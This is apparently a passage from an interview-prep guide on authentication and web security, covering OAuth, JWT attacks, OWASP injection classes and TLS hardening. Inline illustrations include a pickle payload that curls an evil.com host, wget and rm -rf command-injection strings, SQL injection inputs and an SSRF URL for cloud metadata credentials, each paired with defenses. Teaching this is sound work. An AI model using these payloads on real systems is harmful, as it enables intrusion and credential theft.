from cryptography.hazmat.primitives.serialization import load_pem_public_key

def validate_access_token(token, jwks_uri):
    # Fetch JWKS (cache this! don't fetch on every request)
    jwks = requests.get(jwks_uri).json()
    header = jwt.get_unverified_header(token)
    key = find_matching_key(jwks, header["kid"])   # match by key ID
    claims = jwt.decode(token, key, algorithms=["RS256", "ES256"],
                        audience="my-api", issuer="https://auth.example.com")
    return claims  # raises exception if invalid

# Approach 2: Token introspection (RFC 7662) — real-time check
# Calls Authorization Server to check if token is active
POST /introspect
  Authorization: Basic 
  token=

# Response:
{ "active": true, "sub": "user123", "scope": "read write", "exp": 1735689600 }
# { "active": false }  ← token revoked or expired

# Token revocation (RFC 7009):
POST /revoke
  token=
  &token_type_hint=refresh_token
  &client_id=my-app
  &client_secret=secret

# Revocation use cases:
# User clicks "logout" → revoke refresh token
# User changes password → revoke all tokens
# Suspicious activity detected → revoke all sessions
# Admin removes user's access → revoke all their tokens

8What is DPoP (Demonstration of Proof of Possession)? How does it prevent token theft?

Standard OAuth access tokens are bearer tokens — anyone who possesses the token can use it. If stolen (via XSS, log exposure, MITM on internal networks), the attacker has full access until the token expires.

DPoP (RFC 9449) binds access tokens to a client's cryptographic key pair. Each API request must include a proof that the requester holds the private key corresponding to the public key in the token.

# DPoP flow:
# 1. Client generates an ephemeral key pair (per-session or per-request)
# 2. Client includes the public key in the DPoP proof JWT sent during token request
# 3. Authorization Server binds the public key fingerprint (jkt) into the access token
# 4. For every API call, client generates a fresh DPoP proof JWT signed with private key:
{
  "typ": "dpop+jwt",
  "alg": "ES256",
  "jwk": { "kty": "EC", "crv": "P-256", ... }  # public key
}.{
  "jti": "unique-id",           # unique per request (prevents replay)
  "htm": "GET",                  # HTTP method
  "htu": "https://api.example.com/data",  # HTTP URI
  "iat": 1735686000,             # issued at
  "ath": "access_token_hash"     # hash of the access token (binds proof to token)
}

# 5. Resource Server validates:
#    - DPoP proof signature using the public key in the proof header
#    - Access token's jkt claim matches the proof's public key fingerprint
#    - jti hasn't been seen before (replay prevention)
#    - htm/htu match the actual request
#    - iat is recent (prevent delayed replay)

# Result: stolen token is useless without the private key
# Mitigation of: XSS token theft, log-based token exposure, internal MITM

9What are common OAuth 2.0 attack vectors? Explain redirect_uri manipulation and open redirectors.

# Attack 1: redirect_uri manipulation
# Vulnerable: Authorization Server accepts wildcard/partial matches
# Legitimate: redirect_uri=https://myapp.com/callback
# Attack:     redirect_uri=https://myapp.com.evil.com/steal
#             redirect_uri=https://myapp.com/callback/../steal
# If accepted, authorization code is sent to attacker's server

# Fix: exact string matching for redirect_uri, registered at client registration
# Never allow wildcards, path traversal, or partial matches

# Attack 2: Authorization Code Interception (without PKCE)
# Malicious app on mobile registers the same custom URL scheme
# Legitimate: myapp://callback → authorization code delivered to app
# Attack: malicious_app://callback → intercepts the code
# Fix: PKCE (code_verifier proves it's the same process that started the flow)

# Attack 3: Open Redirector
# If your app has an open redirect vulnerability:
# https://myapp.com/redirect?url=https://evil.com
# Attacker crafts: redirect_uri=https://myapp.com/redirect?url=https://steal.evil.com
# Auth server sees myapp.com → validates, redirects code → open redirector → evil.com
# Fix: whitelist redirect_uri exactly; eliminate open redirectors

# Attack 4: Mix-Up Attack
# When client talks to multiple Authorization Servers, attacker tricks client
# into sending tokens to the wrong resource server
# Fix: Issuer identification in the authorization response (RFC 9207 iss parameter)

# Attack 5: Insufficient scope validation
# Client requests minimal scopes but some servers grant more
# Fix: Resource server validates exact scopes in the token for each operation

# Defense summary:
# - Exact redirect_uri matching
# - Always validate state parameter
# - PKCE for all flows
# - Short access token lifetimes
# - Refresh token rotation with reuse detection
# - Token binding (DPoP) for high-security applications

JWT & Token Security

7 questions

1What is a JWT? Explain its structure, how it's signed, and how to validate it.

A JWT (JSON Web Token, RFC 7519) is a compact, URL-safe token consisting of three Base64URL-encoded JSON parts separated by dots: header.payload.signature.

# Structure:
# header: {"alg": "RS256", "typ": "JWT", "kid": "key-id"}
# payload: {"sub": "user123", "iss": "https://auth.example.com", "exp": 1735689600, ...}
# signature: RS256_sign(private_key, base64url(header) + "." + base64url(payload))

# Signing algorithms:
# RS256: RSA signature with SHA-256 — asymmetric, server signs with private key,
#         anyone can verify with public key (most common in OIDC)
# HS256: HMAC-SHA256 — symmetric, same secret for sign+verify
#         (only use for internal services where all parties share the secret)
# ES256: ECDSA with P-256 — asymmetric, smaller keys than RSA

# Validation checklist:
import jwt  # PyJWT
def validate_jwt(token, public_key):
    claims = jwt.decode(
        token,
        public_key,
        algorithms=["RS256"],           # MUST specify — never allow "none"
        audience="my-service",          # verify aud claim
        issuer="https://auth.example.com",  # verify iss claim
        options={
            "verify_exp": True,         # verify expiry
            "verify_nbf": True,         # verify not-before
            "require": ["exp", "iat", "sub"],  # required claims
        }
    )
    return claims

# Critical: validate EVERY claim:
# 1. sig: cryptographic signature valid?
# 2. alg: expected algorithm? (prevent algorithm confusion)
# 3. exp: not expired?
# 4. nbf: not-before has passed?
# 5. iss: from trusted issuer?
# 6. aud: intended for this service?

2What is the "alg:none" JWT vulnerability? What other algorithm confusion attacks exist?

These are among the most famous JWT vulnerabilities — real bugs found in many libraries and applications.

1. alg:none attack:

# Attacker modifies JWT header to alg:"none"
# Strips the signature
# Vulnerable libraries accept unsigned tokens!
# {"alg": "none", "typ": "JWT"}.{"sub": "admin"}.  ← no signature!

# Fix: ALWAYS specify allowed algorithms explicitly in your verification:
jwt.decode(token, key, algorithms=["RS256"])  # NEVER algorithms=["none"]
# Never trust the header's algorithm — always enforce server-side

2. RS256 → HS256 confusion attack:

# Server uses RS256 (asymmetric). Public key is, well, public.
# Attacker changes header to alg:"HS256"
# Attacker signs token with HMAC using the server's PUBLIC KEY as the HMAC secret
# Vulnerable server: "HS256? Let me verify with my configured key..." (which is the public key)
# → Token accepted!

# Attack works when server naively uses "configured key" regardless of algorithm.
# Fix: strict algorithm enforcement — if you expect RS256, reject anything else.
# Never allow the caller to specify which algorithm to use for verification.

3. Key confusion in multi-tenant systems: Using the same JWT secret across tenants. A token issued for tenant A could be accepted by tenant B's API. Fix: include tenant ID in the JWT and validate it against the authenticated tenant context.

4. kid (Key ID) injection: Vulnerable servers use the kid header to fetch the verification key from a database. Attacker sets kid to an SQL injection payload or a path to a predictable file. Fix: treat kid as untrusted input — whitelist valid key IDs, never construct SQL/file paths from kid.

3What should and shouldn't go in JWT claims? What are common design mistakes?

JWTs are self-contained — the token itself carries all necessary information without a database lookup. This is powerful but has trade-offs.

Good candidates for JWT claims:

User ID (sub), issuer (iss), audience (aud), expiry (exp)
Roles or scopes for the current session
Tenant ID for multi-tenant systems
Session ID (for revocation capability)

What NOT to put in JWTs:

Sensitive data: JWTs are Base64-encoded, not encrypted. Anyone with the token can read the payload. No passwords, SSNs, credit card numbers, medical data.
Data that changes frequently: User's email, roles, subscription tier. The token is a snapshot — stale data remains valid until expiry. Use short TTLs or opaque tokens with database lookup if staleness is unacceptable.
Large payloads: JWTs are sent in every request header. 10KB JWTs add significant overhead. Keep payloads small.

# JWE (JSON Web Encryption) — if you must put sensitive data:
# header.encrypted_key.iv.ciphertext.tag
# Encrypts the payload using recipient's public key
# Much heavier — only use when truly needed

# The "stateless vs revocability" dilemma:
# Pure JWT: no database lookup, can't revoke individual tokens
# Solution: keep JWTs short-lived (15 min), use refresh tokens (can revoke)
# For immediate revocation: maintain a small denylist of revoked JTI (JWT IDs)
# — much smaller than a full session store

4Where should you store JWTs in a web application? Compare localStorage vs httpOnly cookies.

Storage location determines the attack surface — this is one of the most debated security questions in frontend development.

localStorage / sessionStorage:

Any JavaScript on the page can read it — XSS attack = token theft
Persistent across tabs and browser restarts (localStorage)
Easy to implement for SPAs with REST APIs
Verdict: Acceptable only if XSS is thoroughly prevented (CSP, output encoding, no user-controlled JS). Not recommended for high-security applications.

HttpOnly cookies:

JavaScript cannot read HttpOnly cookies — XSS cannot steal the token
Browser sends automatically — no JS needed to attach to requests
Vulnerable to CSRF — must pair with SameSite=Strict/Lax or CSRF tokens
Verdict: Recommended for most applications — better XSS resilience

# Recommended configuration:
Set-Cookie: access_token=; HttpOnly; Secure; SameSite=Lax; Path=/api; Max-Age=900
Set-Cookie: refresh_token=; HttpOnly; Secure; SameSite=Strict; Path=/auth/refresh; Max-Age=2592000

# BFF (Backend for Frontend) pattern:
# SPA calls a BFF server (same origin) via session cookie
# BFF holds the actual access token server-side
# BFF calls downstream APIs using the access token
# Token never touches the browser at all — most secure approach
# Used by: Auth0's "Auth0 for SPAs" with token rotation, Next.js Auth

5What is token introspection and how do you handle JWT revocation at scale?

# The revocation problem:
# JWTs are stateless — once issued, valid until exp
# Even after logout/password change, token is mathematically valid
# How to invalidate?

# Strategy 1: Short TTL (simplest)
# Access tokens expire in 5-15 minutes
# User "logout" = delete token client-side + revoke refresh token
# Rogue token window = at most 15 minutes

# Strategy 2: JWT Denylist (for immediate revocation)
# Store revoked JTI (JWT ID) in Redis with TTL = token's remaining lifetime
import redis
r = redis.Redis()

def revoke_token(jti, remaining_ttl):
    r.setex(f"revoked:{jti}", remaining_ttl, "1")

def is_revoked(jti):
    return r.exists(f"revoked:{jti}")

def validate_jwt(token):
    claims = jwt.decode(token, ...)  # signature, exp, etc.
    if is_revoked(claims["jti"]):
        raise TokenRevokedException()
    return claims
# Only revoked tokens in the set — much smaller than full session store
# Automatically cleaned up via TTL when tokens expire

# Strategy 3: Token generation counter
# Store per-user counter in DB: users.token_generation = 7
# Include in JWT: {"gen": 7}
# On revoke-all: increment counter to 8
# On validation: reject if token.gen < current_generation
# Single DB read per request — scalable, handles "logout all devices"

# Strategy 4: Versioned tokens
# Similar to generation counter but per-device/session

6How do you design API key authentication? What are best practices for key generation, storage, and rotation?

# API key format best practices:
import secrets, hashlib

# Include a prefix for scanning tools to detect leaks:
def generate_api_key():
    key = secrets.token_urlsafe(32)   # 256 bits of entropy
    return f"sk_{key}"               # prefix identifies the key type

# Store ONLY a hash in the database — if DB compromised, keys aren't exposed:
def store_api_key(raw_key, user_id, name):
    key_hash = hashlib.sha256(raw_key.encode()).hexdigest()
    db.execute("""
        INSERT INTO api_keys (hash, user_id, name, created_at, last_used_at)
        VALUES ($1, $2, $3, NOW(), NULL)
    """, key_hash, user_id, name)
    # Show raw_key to user ONCE — never store or show again

def validate_api_key(raw_key):
    key_hash = hashlib.sha256(raw_key.encode()).hexdigest()
    key = db.query("SELECT * FROM api_keys WHERE hash = $1", key_hash)
    if not key: raise UnauthorizedException()
    db.execute("UPDATE api_keys SET last_used_at = NOW() WHERE id = $1", key.id)
    return key

# Key rotation without downtime:
# 1. Generate new key, show to user
# 2. Both old and new key work during transition period
# 3. User updates their integrations to use new key
# 4. After grace period, revoke old key

# Scoped keys: read-only, write, admin — limit blast radius
# Key expiry: force periodic rotation
# Rate limiting per key: prevent abuse
# Audit log: every API call logged with which key was used

7What is the difference between opaque tokens and structured tokens (JWT)? When do you choose each?

Opaque tokens: Random strings with no inherent meaning. Validated by calling the authorization server's introspection endpoint. The token itself contains no data.

JWT (structured tokens): Self-contained, signed tokens carrying claims. Validated locally using the issuer's public key. No network call required per request.

# Comparison:
# Opaque tokens:
# ✅ Revocable instantly (lookup by token → delete row)
# ✅ Sensitive data never leaves the auth server
# ✅ Token size: tiny (just a random ID)
# ❌ Network call to auth server for every validation (latency, availability dependency)

# JWT tokens:
# ✅ Stateless validation — no network call needed, scales horizontally
# ✅ Works offline/disconnected systems
# ❌ Cannot revoke individual tokens (only short TTL helps)
# ❌ Claims can be stale until token expires
# ❌ Larger size (headers on every request)

# When to use opaque:
# When immediate revocation is required (financial, healthcare)
# When you want to hide user data from intermediaries
# Internal microservice tokens where you control all parties

# When to use JWT:
# Third-party APIs you don't control (can't call your auth server)
# Horizontally scaled services needing stateless validation
# Short-lived tokens (15 min) where revocation window is acceptable
# Cross-service tokens within a trusted service mesh

# Hybrid approach (common in practice):
# Refresh tokens: opaque (stored in DB, revocable instantly)
# Access tokens: JWT (short-lived, stateless validation)
# Best of both: quick revocation via refresh token, fast access token validation

Web Application Security (OWASP)

10 questions

1What is SQL injection and how do you prevent it? Why do parameterized queries work?

SQL injection occurs when user-supplied input is concatenated into SQL queries, allowing attackers to modify the query's logic. It remains the #1 most critical web vulnerability (OWASP A03).

# VULNERABLE — string interpolation:
username = request.form["username"]
query = f"SELECT * FROM users WHERE username = '{username}'"
# Input: ' OR '1'='1' --
# Query becomes: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns all users! Attacker is authenticated as first user.
# Worse: ' ; DROP TABLE users --

# SAFE — parameterized queries (prepared statements):
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
# The DB driver sends query and parameters SEPARATELY
# Database parses the SQL structure first, then substitutes parameters as data
# Parameters CANNOT change query structure — they're always treated as values

# ORMs are also safe by default (when used correctly):
User.query.filter_by(username=username).first()  # SQLAlchemy — safe
# UNSAFE even with ORM — raw SQL with format strings:
db.execute(f"SELECT * FROM users WHERE name = '{name}'")  # still injectable!

# Other injection types — same principle:
# NoSQL injection: {"username": {"$gt": ""}} in MongoDB
# LDAP injection: )(uid=*))(|(uid=*
# OS command injection: os.system(f"convert {filename}.png")  ← ; rm -rf /
# XXE injection in XML parsers

# Defense in depth:
# 1. Parameterized queries ALWAYS (primary defense)
# 2. Input validation (whitelist expected format)
# 3. Least-privilege DB user (no DROP, no admin)
# 4. WAF to detect/block injection patterns
# 5. Error handling — never expose DB errors to users

2What is XSS (Cross-Site Scripting)? Compare stored, reflected, and DOM-based XSS and defenses.

XSS allows attackers to inject malicious scripts into web pages viewed by other users. The injected script runs in the victim's browser with the same origin as the target site.

Stored XSS: Malicious script persisted in the database. Every user who views the content gets the script. Highest impact.

Reflected XSS: Script in the URL/request, reflected back in the response. Victim must click a crafted link.

DOM-based XSS: Script in the URL fragment, read by client-side JavaScript. Never touches the server — can't be caught by server-side sanitization.

# VULNERABLE — rendering user input as HTML:
# Template: {{comment}}  (unescaped)
# Input: 
# → Steals session cookies, exfiltrates data, defaces page, keylogging

# Defense 1: Context-aware output encoding (primary defense)
import html
safe = html.escape(user_input)           # HTML context: & → & < → <
# URL context:  quote(user_input)
# JS context:   json.dumps(user_input)    # never concatenate into JS strings

# Defense 2: Content Security Policy (CSP)
Content-Security-Policy: default-src 'self';
  script-src 'self' 'nonce-{random}';     # only scripts with this nonce run
  img-src 'self' data:;
  style-src 'self' 'unsafe-inline';
  frame-ancestors 'none';                  # clickjacking protection

# Defense 3: Trusted Types API (modern browsers)
# Requires all DOM manipulations to go through a typed API
# Blocks innerHTML assignments with raw strings

# Defense 4: HttpOnly cookies
# XSS can't steal HttpOnly cookies via document.cookie
# Limits the damage (but XSS can still perform actions on behalf of user)

# DOM XSS — sources and sinks:
# Sources (attacker-controlled): location.hash, location.search, document.referrer
# Sinks (dangerous): innerHTML, document.write, eval(), setTimeout(string)
# Safe: textContent, innerText, setAttribute for non-event attributes

3What is SSRF (Server-Side Request Forgery) and why is it especially dangerous in cloud environments?

SSRF tricks the server into making requests to internal/unintended destinations. The request comes from the server — bypassing firewall rules that protect internal services from external access.

# Vulnerable code — user-controlled URL fetch:
url = request.args.get("url")
response = requests.get(url)              # fetches whatever URL the user provides!

# Attack 1: Internal services
# url = http://internal-db:5432/admin
# url = http://10.0.0.1/admin

# Attack 2: Cloud metadata (most critical)
# AWS IMDSv1 — no auth required:
# url = http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
# Returns temporary AWS credentials! Attacker gets full IAM role access.
# Capital One breach (2019): SSRF → metadata service → IAM credentials → S3 bucket access

# Attack 3: Internal services via DNS rebinding
# DNS resolves to permitted IP initially, then to 169.254.169.254 after check

# Defenses:
# 1. Block requests to private IP ranges and metadata endpoints:
import ipaddress, socket
BLOCKED = [
    ipaddress.ip_network("169.254.0.0/16"),   # link-local / metadata
    ipaddress.ip_network("10.0.0.0/8"),        # private
    ipaddress.ip_network("172.16.0.0/12"),     # private
    ipaddress.ip_network("192.168.0.0/16"),    # private
    ipaddress.ip_network("127.0.0.0/8"),       # loopback
]
def is_safe_url(url):
    host = urllib.parse.urlparse(url).hostname
    ip = ipaddress.ip_address(socket.gethostbyname(host))
    return not any(ip in net for net in BLOCKED)

# 2. AWS IMDSv2 — requires session token (one hop protection):
# aws ec2 modify-instance-metadata-options --http-tokens required
# SSRF attack must make two sequential requests — harder but not impossible

# 3. Allowlist approach: only fetch from permitted domains
# 4. DNS resolution at validation time AND request time (TOCTOU fix)

4What is insecure deserialization? Why is deserializing untrusted data dangerous?

Deserialization converts data from a storable/transmittable format back into an object. If the format is binary (Pickle, Java ObjectInputStream, PHP unserialize) and includes class information, an attacker can craft malicious payloads that execute arbitrary code when deserialized — a Remote Code Execution (RCE) vulnerability.

# Python pickle — NEVER deserialize untrusted data:
import pickle
# Safe: pickle.dumps(your_data)
# DANGEROUS:
data = base64.b64decode(user_cookie)
obj = pickle.loads(data)   # executes __reduce__ on the object graph!

# Malicious pickle payload:
class Exploit:
    def __reduce__(self):
        return (os.system, ("curl https://evil.com/$(whoami)",))
# pickle.loads(pickle.dumps(Exploit())) → executes the command!

# Java deserialization gadget chains:
# Apache Commons Collections + Java ObjectInputStream → RCE
# Used in attacks against WebLogic, JBoss, Jenkins, etc.

# Safe alternatives:
# Use JSON/MessagePack/Protobuf — only data, no code execution
# If you must use binary serialization, sign the data with HMAC before storing
# Verify HMAC before deserializing:
import hmac, hashlib
def safe_deserialize(payload, secret):
    data, sig = payload[:-32], payload[-32:]
    expected = hmac.new(secret, data, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise ValueError("Invalid signature")
    return pickle.loads(data)  # now verified to be our own data

# Signed cookies in Flask use this pattern:
# session cookie = base64(data).base64(HMAC-SHA1(data, secret_key))

5What are security headers? Explain CSP, HSTS, X-Frame-Options, and others.

# HSTS (HTTP Strict Transport Security):
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
# Tells browser: only connect via HTTPS for the next 2 years
# Prevents SSL stripping attacks (MITM downgrades HTTPS → HTTP)
# preload: submit to browser preload lists — enforced before first visit

# Content-Security-Policy (CSP): controls resource loading
Content-Security-Policy:
  default-src 'self';                   # default: only same-origin
  script-src 'self' 'nonce-{random}';   # scripts must have matching nonce
  img-src 'self' https://cdn.example.com data:;
  connect-src 'self' https://api.example.com;
  font-src 'self' https://fonts.googleapis.com;
  frame-ancestors 'none';               # prevents embedding in iframes
  upgrade-insecure-requests;            # auto-upgrade HTTP → HTTPS
  report-uri /csp-report;              # report violations

# X-Frame-Options (superseded by CSP frame-ancestors, but still good):
X-Frame-Options: DENY               # prevents all iframe embedding
X-Frame-Options: SAMEORIGIN         # only same-origin can embed

# X-Content-Type-Options:
X-Content-Type-Options: nosniff
# Prevents browser MIME type sniffing — executes files only as declared Content-Type
# Without this: upload a .jpg containing HTML, browser might execute it

# Referrer-Policy:
Referrer-Policy: strict-origin-when-cross-origin
# Limits URL leakage in Referer header to cross-origin requests

# Permissions-Policy (formerly Feature-Policy):
Permissions-Policy: camera=(), microphone=(), geolocation=()
# Opt out of browser APIs you don't use — reduce attack surface

# Cross-Origin headers (CORP/COEP/COOP):
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
# Enables SharedArrayBuffer and high-resolution timers (Spectre mitigations)

6What is path traversal and what other injection vulnerabilities should senior engineers know?

# Path traversal:
filename = request.args.get("file")
path = f"/app/uploads/{filename}"
return open(path).read()
# Attack: filename = "../../../../etc/passwd"
# Fix: resolve canonical path and verify it starts with the intended base
import os
base = "/app/uploads"
safe_path = os.path.realpath(os.path.join(base, filename))
if not safe_path.startswith(base + os.sep):
    raise PermissionError("Path traversal detected")

# Command injection:
os.system(f"convert {user_input} output.png")
# Attack: ; rm -rf / or $(wget evil.com/malware)
# Fix: use subprocess with list args (no shell):
import subprocess
subprocess.run(["convert", user_input, "output.png"], check=True)  # safe!

# XXE (XML External Entity):
from lxml import etree
parser = etree.XMLParser(resolve_entities=True)   # VULNERABLE
tree = etree.parse(user_xml, parser)
# Attack payload:
# ]>
# &xxe;  ← reads /etc/passwd

# Safe XML parsing:
parser = etree.XMLParser(resolve_entities=False, no_network=True)

# Template injection (SSTI):
from jinja2 import Template
template = Template(user_input)   # NEVER render user input as a template!
# Attack: {{config.items()}} or {{''.__class__.__mro__[1].__subclasses__()}}
# Fix: user data goes into template CONTEXT, not as the template itself
Template("Hello, {{ name }}!").render(name=user_input)  # safe

7What is insecure direct object reference (IDOR)? How do you prevent broken object-level authorization?

IDOR (and its API variant BOLA — Broken Object Level Authorization) is the most common API vulnerability. An attacker simply changes an ID parameter to access another user's data.

# VULNERABLE — no authorization check:
@app.get("/api/orders/{order_id}")
def get_order(order_id: int, user=Depends(get_current_user)):
    order = db.query(Order).filter(Order.id == order_id).first()
    return order  # ← any authenticated user can access any order!

# SECURE — always filter by current user:
@app.get("/api/orders/{order_id}")
def get_order(order_id: int, user=Depends(get_current_user)):
    order = db.query(Order).filter(
        Order.id == order_id,
        Order.user_id == user.id      # ← must own this order
    ).first()
    if not order: raise HTTPException(404)  # 404, not 403 — don't leak existence
    return order

# For admin access: explicit role check first:
@app.get("/api/admin/orders/{order_id}")
def admin_get_order(order_id: int, user=Depends(require_admin)):
    return db.query(Order).filter(Order.id == order_id).first()

# Additional mitigations:
# Use UUIDs instead of sequential IDs — harder to enumerate
# (but not a substitute for proper auth — security through obscurity alone is not enough)

# Policy-based authorization with OPA/Cedar:
# is_authorized(user, "orders:read", order) → true/false
# Centralize authorization logic — every endpoint checks the policy

Testing for IDOR: Create two accounts, perform an action with account A, capture the request, replay with account B's session but account A's IDs. If you can access A's data as B, it's an IDOR. Automated testing tools (Burp Suite Intruder, OWASP ZAP) can automate this.

8What are supply chain attacks? How do you defend against dependency confusion and typosquatting?

Supply chain attacks target the development and build process rather than the running application. If a malicious package gets into your build, the attacker's code runs in your production environment.

Dependency confusion (Alex Birsan, 2021): If your package manager checks public registries before private ones, an attacker can publish a malicious package to npm/PyPI with the same name as your internal package but a higher version number. The build system picks up the malicious public version.

# Fix for npm: use scoped packages and enforce scope registry in .npmrc:
@mycompany:registry=https://my.private.registry.com
always-auth=true
# Scoped packages (@mycompany/auth) can only be resolved from the configured registry

# Fix for pip: --index-url (replaces default) vs --extra-index-url (adds to defaults)
pip install --index-url https://my.private.pypi.com/simple/ mypackage
# NOT: pip install --extra-index-url (still checks public PyPI — vulnerable!)

Typosquatting: Malicious packages named similar to popular ones. colourama (vs colorama), python-dateutil (correct) vs dateutil.

Defenses:

Lock files: package-lock.json, poetry.lock, Cargo.lock — pin exact versions AND checksums
Dependency auditing: npm audit, pip audit, Dependabot, Snyk — alert on known CVEs
SBOM (Software Bill of Materials): inventory of all dependencies for auditing
Sigstore/sigsum: cryptographic signing of packages and build artifacts
Reproducible builds: same source → same binary, bit-for-bit — detect tampering

9What is rate limiting and how do you implement it to prevent brute force and DoS?

# Rate limiting for authentication endpoints:
import redis, time
r = redis.Redis()

def rate_limit_login(identifier, max_attempts=5, window_seconds=900):
    """Limit login attempts per user/IP. Lock for 15 minutes after 5 failures."""
    key = f"login_attempts:{identifier}"
    attempts = r.incr(key)
    if attempts == 1: r.expire(key, window_seconds)  # set TTL on first attempt
    if attempts > max_attempts:
        ttl = r.ttl(key)
        raise RateLimitError(f"Too many attempts. Try again in {ttl} seconds.")
    return max_attempts - attempts  # remaining attempts

# Progressive delays (account enumeration via timing):
def login_with_delay(username, password):
    user = db.get_user_by_email(username)
    if user:
        correct = verify_password(password, user.password_hash)
    else:
        # Always run password hash even if user doesn't exist
        verify_password(password, dummy_hash)  # prevent timing oracle
        correct = False
    if not correct: raise AuthenticationError()
    return create_session(user)

# Token bucket for API rate limiting:
def check_api_rate_limit(api_key, limit=100, window=60):
    key = f"rate:{api_key}:{int(time.time()/window)}"
    count = r.incr(key)
    if count == 1: r.expire(key, window * 2)
    if count > limit:
        raise RateLimitError("Rate limit exceeded")

# Return standard headers:
response.headers["X-RateLimit-Limit"] = limit
response.headers["X-RateLimit-Remaining"] = max(0, limit - count)
response.headers["X-RateLimit-Reset"] = int(time.time()/window + 1) * window
response.headers["Retry-After"] = window  # on 429

10What is the OWASP Top 10 and how does it guide security priorities?

The OWASP Top 10 (latest: 2021) identifies the most critical web application security risks, based on real-world data from security assessments and CVE databases.

A01 — Broken Access Control: IDOR, BOLA, privilege escalation, missing authorization checks. The most common critical finding.
A02 — Cryptographic Failures: Weak encryption, unencrypted sensitive data in transit or at rest, poor key management.
A03 — Injection: SQLi, command injection, LDAP injection, XXE. Classic and still prevalent.
A04 — Insecure Design: Missing threat modeling, lack of security requirements, insecure architecture patterns.
A05 — Security Misconfiguration: Default credentials, overly permissive CORS, verbose error messages, open cloud storage buckets.
A06 — Vulnerable and Outdated Components: Log4Shell, Heartbleed, Equifax breach — all known CVEs in dependencies.
A07 — Identification and Authentication Failures: Credential stuffing, weak passwords, improper session management.
A08 — Software and Data Integrity Failures: Insecure deserialization, unverified updates, CI/CD pipeline compromise.
A09 — Security Logging and Monitoring Failures: Not detecting attacks, insufficient audit logs, no alerting.
A10 — Server-Side Request Forgery (SSRF): Added in 2021 — high frequency in modern cloud architectures.

Also watch: OWASP API Security Top 10 (2023) which adds API-specific issues like Mass Assignment and Unrestricted Resource Consumption, highly relevant for microservices.

TLS & Network Security

7 questions

1How does TLS 1.3 handshake work? What changed from TLS 1.2?

TLS (Transport Layer Security) provides encrypted, authenticated, and integrity-protected communication. TLS 1.3 (RFC 8446, 2018) is a major redesign that's faster, simpler, and more secure than 1.2.

TLS 1.3 handshake (1-RTT):

# Client → Server: ClientHello
# Contains: TLS version, supported cipher suites, key_share (ECDH public key),
#           supported_groups (curves), session ticket for 0-RTT

# Server → Client: ServerHello + {EncryptedExtensions + Certificate + CertVerify + Finished}
# ServerHello: chosen cipher suite, key_share (server's ECDH public key)
# Both sides derive shared secret: ECDHE(client_private, server_public)
# Everything after ServerHello is encrypted with derived keys

# Client → Server: {Finished} [+ Application Data]
# Total: 1 RTT (vs 2 RTT in TLS 1.2)

# 0-RTT (Early Data): client can send app data with the first message
# using a pre-shared key from previous session (session resumption)
# Trade-off: no forward secrecy for early data, replay attacks possible
# Use only for non-state-changing GET requests

TLS 1.3 improvements over 1.2:

Reduced handshake: 1 RTT (vs 2 RTT in 1.2). 0-RTT session resumption.
Forward secrecy mandatory: All key exchange uses ephemeral ECDHE — no static RSA key exchange.
Removed weak algorithms: No RSA key exchange, no CBC cipher suites, no SHA-1, no RC4, no DES/3DES, no MD5.
Mandatory cipher suites: Only AEAD (AES-GCM, ChaCha20-Poly1305).
Encrypted more of the handshake: Certificate is encrypted — hides server identity from passive observers.

2What are common TLS misconfigurations? How do you test and harden TLS deployments?

# Common misconfigurations:
# 1. Supporting old protocol versions:
#    SSLv3: POODLE attack (2014)
#    TLS 1.0/1.1: BEAST, POODLE TLS, deprecated by RFC 8996

# nginx hardened TLS config:
ssl_protocols TLSv1.2 TLSv1.3;           # disable 1.0 and 1.1
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:
            ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:
            ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305;
ssl_prefer_server_ciphers off;            # let client choose (TLS 1.3)
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:10m;
ssl_session_tickets off;                  # disable for better forward secrecy

# HSTS header
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;

# OCSP Stapling — server fetches and caches certificate revocation status
ssl_stapling on;
ssl_stapling_verify on;
resolver 8.8.8.8 8.8.4.4 valid=300s;

# 2. Weak cipher suites: anything with NULL, EXPORT, anon, DES, RC4, MD5
# 3. Self-signed certs in production
# 4. Expired certificates
# 5. Missing HSTS (allows downgrade attacks)

# Testing tools:
# testssl.sh — comprehensive CLI TLS tester
# SSL Labs server test — https://ssllabs.com/ssltest
# nmap: nmap --script ssl-enum-ciphers -p 443 target.com

3What is mTLS (mutual TLS)? When do you use it in microservices?

In standard TLS, only the server authenticates to the client (via certificate). In mTLS (mutual TLS), both parties authenticate to each other — the client also presents a certificate. This provides strong workload identity without shared secrets.

# mTLS: both client and server authenticate via certificates
# Server validates: client cert is signed by trusted CA, not revoked, valid
# Client validates: server cert as usual

# Use cases in microservices:
# - Service-to-service authentication in a zero-trust network
# - Replace API keys / shared secrets between internal services
# - Meet compliance requirements for inter-service encryption (PCI-DSS, HIPAA)

# Implementation approaches:
# 1. Service mesh (most common at scale):
#    Istio / Linkerd — inject a sidecar proxy that handles mTLS transparently
#    Services communicate over loopback, sidecar handles certs and TLS
#    Automatic cert rotation, mTLS enforced without code changes

# 2. Manual cert management:
from ssl import SSLContext, PROTOCOL_TLS_CLIENT, PROTOCOL_TLS_SERVER
import ssl

# Server:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")
ctx.load_verify_locations("ca.crt")           # trust this CA for client certs
ctx.verify_mode = ssl.CERT_REQUIRED           # require client cert

# Client:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_cert_chain("client.crt", "client.key")  # present client cert
ctx.load_verify_locations("ca.crt")

# Certificate rotation challenge:
# Use short-lived certs (SPIFFE/SPIRE: 1-hour certs, auto-rotated)
# Or cert pinning with planned rotation windows

